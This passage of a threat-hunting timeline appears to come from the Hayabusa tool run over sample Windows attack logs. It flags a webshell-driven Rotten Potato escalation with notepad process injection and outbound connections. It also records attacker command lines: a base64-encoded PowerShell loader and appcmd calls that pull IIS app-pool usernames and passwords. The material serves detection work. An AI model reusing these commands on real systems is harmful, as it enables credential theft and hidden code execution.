Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:59.871 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49168 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:59.871 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49169 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network 
Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.732 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49170 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.732 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49171 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.752 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\notepad.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3388 | Src PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100 | Tgt PID: 1240 | Tgt PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.752 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\notepad.exe | LID: 0x3e7 | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:01.864 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49172 (IEWIN7) | Dst: 10.0.2.18:888 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\notepad.exe | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
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 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 2584 | PGUID: 365ABB72-3D4A-5CEB-0000-0010FA93FD00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,../hayabusa-rules/sigma/process_creation/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Exec,Suspicious Execution of Powershell with Base64,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_encode.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell 
Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.000 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3484 | PGUID: 365ABB72-3D6C-5CEB-0000-00107257FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.110 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2644 | PGUID: 365ABB72-3D6D-5CEB-0000-0010575CFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.190 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2104 | PGUID: 
365ABB72-3D6D-5CEB-0000-00101760FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.270 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3240 | PGUID: 365ABB72-3D6D-5CEB-0000-0010D763FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.350 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3096 | PGUID: 365ABB72-3D6D-5CEB-0000-00109767FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.581 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2928 | PGUID: 
365ABB72-3D6D-5CEB-0000-0010576BFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.661 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUA
YwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1340 | PGUID: 365ABB72-3D6D-5CEB-0000-00108270FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.731 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2448 | PGUID: 365ABB72-3D6D-5CEB-0000-00104474FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.811 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3444 | PGUID: 365ABB72-3D6D-5CEB-0000-00100478FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.891 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 560 | PGUID: 365ABB72-3D6D-5CEB-0000-0010C47BFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.971 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3196 | PGUID: 365ABB72-3D6D-5CEB-0000-00108C7FFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.041 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
